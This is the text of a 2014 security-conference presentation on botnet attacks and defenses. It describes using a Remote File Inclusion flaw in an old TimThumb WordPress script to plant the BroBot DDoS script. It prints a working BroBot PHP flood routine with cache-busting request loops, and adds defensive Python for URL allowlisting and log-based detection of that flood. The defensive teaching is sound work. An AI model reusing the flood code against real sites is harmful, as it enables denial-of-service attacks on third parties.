
Presentation by Terrence O'Connor to CarolinaCon, May 17, 2014

HOW TO BUILD YOUR OWN BOTNET!

WAIT, I PROBABLY CAN'T SAY THAT.
HOW TO DEFEND AGAINST BOTNETS!
Presenter: Terrence O'Connor

INTRODUCTION
Terrence O'Connor - CISSP, CISA, GPEN, C|EH
Global Enterprise Security Architect
Akamai Security Center of Excellence
Based in Atlanta, GA - USA
Over 14 years of security expertise.
Prior role: Global Security Architecture for Travelport
Worked in many verticals including commerce, financial, enterprise, travel and media.

AGENDA
Security
Threat Briefing
Attack Tools and Techniques
Live RFI and DDoS Attacks
Summary
Q&A

Security Concepts
The Super Condensed Version

MOTIVATION
Attacker motivations fall into categories:
Political: Attack those that don't agree with their beliefs.
Financial: There is some financial gain to be had by attacking.
Glory: They attack for recognition of their prowess.
Or: It's Tuesday and they are bored.

Attack impacts:
Data Loss
Service Interruption
Fraud

Attack methods:
Resource Consumption Attacks (DDoS)
Man-in-the-Middle (Manipulation of Data in Transit)
Hijacking/Redirection
Application Attacks: Injecting Unwanted Behavior into Processing Logic
SQL Injection, Command Injection, etc.
The list goes on.


LEVEL SETTING
What are your biggest security concerns and challenges with your online presence?


WHAT KEEPS CISOS UP AT NIGHT?
Data Breaches
How do you mitigate against data breaches and unintentional information disclosure?
Service Availability
Whether through misconfiguration (improper change control) or through attack (DDoS), this generally falls under the oversight of the CISO.
What is your strategy to mitigate availability attacks?
Billing Attacks
Volumetric Traffic Flooding
Those Scaling Overages? Sure, we'll bill you for that!
Brand Protection
What is the cost of an impact to your company's Brand in terms of dollars?


What I've seen

HEADLINES

BOTS NOT LIMITED TO HTTP(S)
Once your applications are compromised by a bot, they can execute any TCP/UDP traffic that the language/server allows.
Examples:
DNS Flood
FTP Brute-force
SSH Brute-force
NTP Reflection/Amplification
SNMP

BROBOT IN ACTION

ADVERSARIES FOLLOWING THE SAME TRENDS
Increasingly focused on the Web Application
Fraud
Web App is trusted by the Database and users of the App
Establish Pivot to target the Enterprise
DDoS has evolved to focus on the Web App in recent years
Utilization of Reflective Services
Cloud Based Attack Adoption
Fast
Easy
Convenient
Powerful

Why is it so easy?

SO MANY REMOTE FILE INCLUSION/COMMAND INJECTION VULNERABILITIES!!!
Source: http://www.exploit-db.com/
Source: http://web.nvd.nist.gov/

KEEP IN MIND
If I own your box,
I own your service.
I own your customers.
I own your reputation.

Tools and Techniques

HIGH LEVEL DEMO OVERVIEW
Attacker
1) Recon/Mapping to find an Application with a known vulnerability
Not covered in the Demo, because Exploitation is more interesting
Hint: Google is a big help!
2) Exploit RFI vulnerability to run attacker-controlled code on the Server
In this case, the code is BroBot DDoS
3) Launch DDoS targeting the OpenCart Site from our new Server

THE SCENARIO
Vulnerable Blog (and consequently, our Bot):
Fully Patched and Updated WordPress
Well-connected
Cloud Hosted
Unprotected Site:
Cloud Hosted
Site with network layer protections, but nothing more.
Protected Site:
Patent Pending Technology
Protects Form Submissions from Bots

WORDPRESS FULLY PATCHED
Some stats:
Powers 1/6 of all sites on the internet.
That's ~70,900,000 sites at last count.
Many disparate hosting providers.
Thousands of Custom Themes
Joomla! has very similar issues

THEME TIMTHUMB DROP-IN
"A small php script for cropping, zooming and resizing web images (jpg, png, gif). Perfect for use on blogs and other applications." - OH NO!
Developed for use in the WordPress theme Mimbo Pro, and since used in many other WordPress themes.
Pulls remote files locally
Not a lot of input checking
Requires file to be local prior to content verification
No default security mechanisms
Note: I am using an older version that's still out there on MANY blogs
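The two complaints on this slide, little input checking and verification only after the file is local, translate into the checks below. This is an added example written for this page, not TimThumb's code; the allowlisted hosts are assumed. It puts a substring host check of the weak kind beside a strict parse-then-compare check that runs before anything is fetched.

```python
from urllib.parse import urlsplit

# Assumed allowlist for the illustration: the image hosts this blog actually
# embeds from. A real deployment configures its own list.
ALLOWED_IMAGE_HOSTS = frozenset({'images.example.com', 'cdn.example.net'})


def weak_host_check(url: str) -> bool:
    """Substring matching: 'not a lot of input checking'. Any URL that merely
    contains an allowed name passes, wherever that name appears."""
    return any(host in url for host in ALLOWED_IMAGE_HOSTS)


def strict_remote_image_url(url: str) -> bool:
    """Accept only http(s) URLs whose host is exactly on the allowlist, with no
    embedded credentials and no non-standard port. Runs before any fetch, so
    nothing is written locally unless the source itself is trusted."""
    try:
        parts = urlsplit(url)
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme not in ('http', 'https'):
        return False               # rejects php://, data:, ftp:, file: and friends
    if parts.username is not None or parts.password is not None:
        return False               # "http://allowed.host@other.host/" style URLs
    host = (parts.hostname or '').lower()
    if host not in ALLOWED_IMAGE_HOSTS:
        return False               # exact match, so "allowed.host.other.host" fails
    if port not in (None, 80, 443):
        return False
    # Only image-looking paths. The content check after download stays as a
    # second layer; it is no longer the only one.
    return parts.path.lower().endswith(('.jpg', '.jpeg', '.png', '.gif'))


if __name__ == '__main__':
    for u in ('http://images.example.com/pic.jpg',
              'http://images.example.com.attacker.example/pic.jpg',
              'http://images.example.com@attacker.example/pic.jpg'):
        print(u, weak_host_check(u), strict_remote_image_url(u))
```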

BAD SCRIPT SERVER - BROBOT
Used primarily by QCF and Us
Very Simple Script
Easily Uploaded
Easily Executed
Creates Massive Traffic and CPU Load on Attacked Servers

BROBOT CODE SNIPPET
// BroBot flood routine as shown on the slide (excerpt; $target is set
// elsewhere in the script and is not part of this snippet).
function curl_download ($remote){

    // Rotates through a fixed list of User-Agent strings, several of them
    // malformed. The fixed list is itself a detection signature.
    $useragent = array(
        'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.16) Gecko/20110929 Iceweasel/3.5.16',
        'IE/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322;)',
        'GoogleSub/2.1 ( http://www.googleSub.com/Sub.html)',
        'msnSub-Products/1.0 (+http://search.msn.com/msnSub.htm)',
        'Opera/9.00 (Windows NT 5.1; U; en)',
        'Safari/5.00 (Macintosh; U; en)');

    $cp = curl_init($remote);
    // The response body goes to a throwaway temp file; the bot never reads it.
    curl_setopt($cp, CURLOPT_FILE, tempnam('',''));
    curl_setopt($cp, CURLOPT_USERAGENT,$useragent[rand(0,count($useragent)-1)]);
    // no-cache header: asks intermediaries to forward every request to origin.
    curl_setopt($cp, CURLOPT_HTTPHEADER,array("Cache-Control: no-cache",""));
    curl_setopt($cp, CURLOPT_HEADER, 0);
    curl_setopt($cp, CURLOPT_RETURNTRANSFER, 1);
    curl_exec($cp);
    curl_close($cp);
}

// 10,000 sequential requests per run, each carrying a random numeric query
// string so that no two URLs are identical and caches cannot absorb them.
if(function_exists(curl_init)){
    for($i = 0;$i < 10000;$i++){
        curl_download($target."?".rand(0,3000)/3.33334444);
    }
}
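Read as a defender, the snippet's fixed User-Agent list and bare numeric query string are a signature. The Python below is an added example, not from the talk; the access-log lines are constructed. It applies that signature to combined-format log lines and counts matching requests per source, the input you would feed a rate limiter or block list at the edge.

```python
import re
from collections import Counter

# Constructed sample of combined-format access-log lines (not real traffic).
# Lines from 203.0.113.10 mimic what the snippet above emits: GET on the site
# root with a bare numeric query string (rand()/3.33334444) and a User-Agent
# taken from its hard-coded list. 198.51.100.7 is an ordinary shopper.
SAMPLE_LOG = """\
203.0.113.10 - - [17/May/2014:10:00:01 -0400] "GET /?899.9988 HTTP/1.1" 200 5120 "-" "Opera/9.00 (Windows NT 5.1; U; en)"
203.0.113.10 - - [17/May/2014:10:00:01 -0400] "GET /?12.299956 HTTP/1.1" 200 5120 "-" "GoogleSub/2.1 ( http://www.googleSub.com/Sub.html)"
198.51.100.7 - - [17/May/2014:10:00:02 -0400] "GET /index.php?route=product/category&path=20 HTTP/1.1" 200 9034 "-" "Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0"
203.0.113.10 - - [17/May/2014:10:00:02 -0400] "GET /?0 HTTP/1.1" 200 5120 "-" "Safari/5.00 (Macintosh; U; en)"
198.51.100.7 - - [17/May/2014:10:00:03 -0400] "GET /image/cache/logo.png HTTP/1.1" 200 1200 "-" "Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)'
                    r' [^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')

# A query string that is nothing but a number ("?899.9988", "?0") is the
# cache-busting token the loop builds; no link on the site produces it.
NUMERIC_QS_RE = re.compile(r'^\?\d+(\.\d+)?$')

# Product tokens copied from the snippet's $useragent array. Several are
# strings no real browser sends ("IE/5.0", "Safari/5.00", "GoogleSub/2.1").
BROBOT_UA_TOKENS = ('Iceweasel/3.5.16', 'IE/5.0 (compatible', 'GoogleSub/2.1',
                    'msnSub-Products/1.0', 'Opera/9.00', 'Safari/5.00')


def is_brobot_like(path: str, ua: str) -> bool:
    """True when a request has the snippet's shape: numeric-only query string
    plus one of its hard-coded User-Agent values."""
    qs = path[path.find('?'):] if '?' in path else ''
    return bool(NUMERIC_QS_RE.match(qs)) and any(t in ua for t in BROBOT_UA_TOKENS)


def flag_sources(log_text: str, threshold: int = 2) -> dict:
    """Return {client_ip: matching_requests} for sources at or above threshold,
    i.e. candidates for rate limiting or blocking at the edge."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_brobot_like(m['path'], m['ua']):
            hits[m['ip']] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}


if __name__ == '__main__':
    print(flag_sources(SAMPLE_LOG))  # {'203.0.113.10': 3}
```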

Attack
It's really easy.

Defense
It's really hard.

PROTECTIONS
Must have Protection against Application Layer Attacks at Global Scale
Real-time, Always-on Security: Seconds Matter!
Protecting Multiple Origins from Attack with one Solution
Bot Mitigation must be Cacheable
Make Inputs Harder to Guess
Block Bad Inputs

Bot Mitigation
Techniques

Recap

SUMMARY
Attacks are easily executed on a large scale
Including DNS, HTTP(S), Data Exfiltration, etc.

Targets are in all verticals and of all sizes
Operating on the internet means constant automated attack
Are you the lowest hanging fruit?

Prepare, Protect, Monitor

MORE INFO

Q&A
Presenter
Terrence O'Connor
terrence.oconnor (at) gmail dot com
Senior Enterprise Security Architect
